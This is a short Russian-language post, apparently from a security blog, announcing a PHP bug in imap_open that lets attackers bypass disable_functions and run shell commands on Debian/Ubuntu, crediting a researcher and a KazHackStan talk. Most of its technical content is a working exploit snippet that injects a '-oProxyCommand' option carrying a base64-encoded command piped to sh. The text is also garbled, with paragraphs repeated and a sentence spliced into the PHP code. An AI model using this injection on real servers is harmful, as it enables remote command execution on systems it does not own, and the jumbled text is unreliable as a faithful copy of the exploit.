Дружно передаем привет чуваку с ником crlf, который заресерчил багу и выложил таск по выполнению кода с обходом disable_functions в PHP, используя функцию imap_open (и некоторые особенности в Debian/Ubuntu).
На секундочку, это 0day!
Эксплойт с выполнением команды
Чуть ниже есть презентация Twoster'а с конференции KazHackStan, ему тоже передаем привет!
На секундочку, это 0day!
Эксплойт с выполнением команды
echo '1234567890'>/tmp/test0001:<?phpОбязательно читаем подробности тут.
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
Чуть ниже есть презентация Twoster'а с конференции KazHackStan, ему тоже передаем привет!